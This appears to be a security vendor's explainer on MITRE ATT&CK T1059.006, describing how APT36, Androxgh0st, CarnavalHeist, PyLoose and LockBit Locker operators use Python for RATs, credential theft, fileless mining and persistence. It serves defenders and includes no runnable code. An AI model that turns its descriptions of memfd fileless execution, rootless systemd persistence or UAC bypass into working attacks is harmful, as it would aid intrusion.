T1059.006 Python in MITRE ATT&CK Explained

What Is T1059.006 Python in MITRE ATT&CK?

T1059.006 Python is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of the Python programming language by adversaries to execute code and automate actions on compromised systems.

Python is a high-level, interpreted language known for its simplicity, extensive standard library, and cross-platform availability across Windows, Linux, and macOS. These characteristics make Python well suited for scripting, automation, and rapid development of functionality that can interact with operating system components, network services, and external libraries.

To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.

Adversary Use of T1059.006 Python

Adversaries use T1059.006 Python to carry out malicious activities by leveraging a portable and flexible execution environment. Python scripts can be easily deployed across different operating systems and integrated into custom malware, loaders, or post-exploitation frameworks.

In attack campaigns, Python is commonly used to execute payloads, automate attack workflows, interact with network services, download additional components, and orchestrate follow-on actions such as persistence or lateral movement. Its readability and ease of modification allow attackers to rapidly adapt tooling while maintaining cross-platform compatibility, making Python a recurring element in modern adversary tradecraft.

Procedure Examples Used by Adversaries in Red Report 2026

The versatility and portability of Python render it a valuable asset for attackers in their operations. Python can seamlessly run on most operating systems and can be readily integrated into various tools and frameworks.

Python as a Vector for Cross-Platform Malware Delivery

For instance, according to an analysis released in December 2025, the Pakistan-based threat actor APT36 (also known as Transparent Tribe) demonstrated a significant evolution in their capabilities [1]. Historically focused on Windows-centric espionage against Indian government/defense entities, the group expanded its arsenal to include sophisticated Linux malware, specifically targeting the Bharat Operating System Solutions (BOSS) distribution used in India's public sector

The swcbc Malware: A Python-Based RAT

The cornerstone of this new campaign is a malware strain identified as swcbc. Analysis confirms this is a Python-based Remote Administration Tool (RAT) compiled into a 64-bit ELF binary using PyInstaller. This compilation technique allows the malware to run on any compatible Linux system without requiring the victim to install Python dependencies manually.

Persistence via Systemd

To survive system reboots, swcbc leverages the systemd init system, which is standard across most modern Linux distributions including BOSS. The malware drops a shell script, swcbc.sh, which automates the creation of a user-level service. This technique allows the malware to persist without requiring root privileges, a common constraint in hardened government environments.

The following shell commands were recovered from the infection chain. The script creates a .service file in the user's configuration directory and enables it.

This script ensures the RAT is launched immediately upon user login (WantedBy=default.target) and restarts automatically if the process is killed (Restart=always).

Procedure Examples Used by Adversaries in Red Report 2025

Malicious Scripting for Credential Harvesting

In January 2024, CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory detailing the Androxgh0st malware, a Python-scripted threat primarily used to target .env files containing confidential information, such as credentials for high-profile applications like Amazon Web Services (AWS) and Microsoft Office 365 [2]. Threat actors deploying Androxgh0st have been observed exploiting specific vulnerabilities, including CVE-2017-9841, to remotely execute code on vulnerable websites via PHPUnit.

Downloading Malicious DLLs with Python-based Scripting

In May 2024, researchers reported on a campaign targeting Brazilian users with a new banking trojan named "CarnavalHeist" [3]The attack chain involved a Windows batch file that downloaded a Python interpreter from the official Python FTP server and installed it in a malware-created folder. Subsequently, an embedded base64-encoded Python script was executed, serving as a loader to inject a malicious DLL payload into memory:

Procedure Examples Used by Adversaries in Red Report 2024

Resource Hijacking (T1496)

Adversaries can leverage Python scripting for resource hijacking. For instance, PyLoose is a Python-based fileless malware that targets cloud workloads with a focus on executing a cryptominer directly in memory [4]. It gains initial access through vulnerable Jupyter Notebook services, which allow the execution of Python code and system commands. The malware is fetched from a public paste site using HTTPS, circumventing file system-based detection by loading directly into the Python runtime's memory. The script is concise, with only nine lines of code that decode and decompress an XMRig miner payload, then execute it in-memory using Linux's memfd feature, which creates file-like memory objects.

This method of execution is stealthy, as it leaves no traditional file system footprint, making detection and forensic investigation difficult. The attack is sophisticated, employing evasion techniques and demonstrating an advanced level of threat actor skill, indicative of an adversary with significant capabilities in targeting cloud environments.

Persistence and Malicious Code Execution

In August 2023, the National Police of Spain warned of an ongoing 'LockBit Locker' ransomware campaign targeting architecture companies through phishing emails [5].

In their attack campaigns, the attackers send emails from a made-up domain. They pretend to be a photography store looking for renovation plans to build trust with their targets. Once trust is established, they propose a meeting and provide an IMG file containing a disguised Windows shortcut. When this shortcut is activated, it triggers a Python script that checks for admin privileges.

Figure 1. Malicious Python Script of LockBit Locker Ransomware [5].

If admin rights are present, the script establishes persistence mechanisms on the system and executes the ransomware, encrypting the user's files. In cases where admin rights are absent, the script employs a UAC bypass technique to execute the ransomware with elevated privileges.

The sophistication of this campaign lies in its ability to convincingly mimic legitimate business inquiries, thereby evading standard anti-phishing defenses employed by companies.

Validate Your Defenses Against the Red Report 2026 Threats

References

[1] “APT36 Python Based ELF Malware Targeting Indian Government Entities,” CYFIRMA. Available: https://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/. [Accessed: Dec. 02, 2025]

[2] “Website.” Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a

[3] C. Talos, “New banking trojan ‘CarnavalHeist’ targets Brazil with overlay attacks,” Cisco Talos Blog, May 31, 2024. Available: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/. [Accessed: Nov. 27, 2024]

[4] “PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer,” wiz.io, Jul. 11, 2023. Available: https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads. [Accessed: Dec. 20, 2023]

[5] B. Toulas, “Spain warns of LockBit Locker ransomware phishing attacks,” BleepingComputer, Aug. 28, 2023. Available: https://www.bleepingcomputer.com/news/security/spain-warns-of-lockbit-locker-ransomware-phishing-attacks/. [Accessed: Dec. 20, 2023]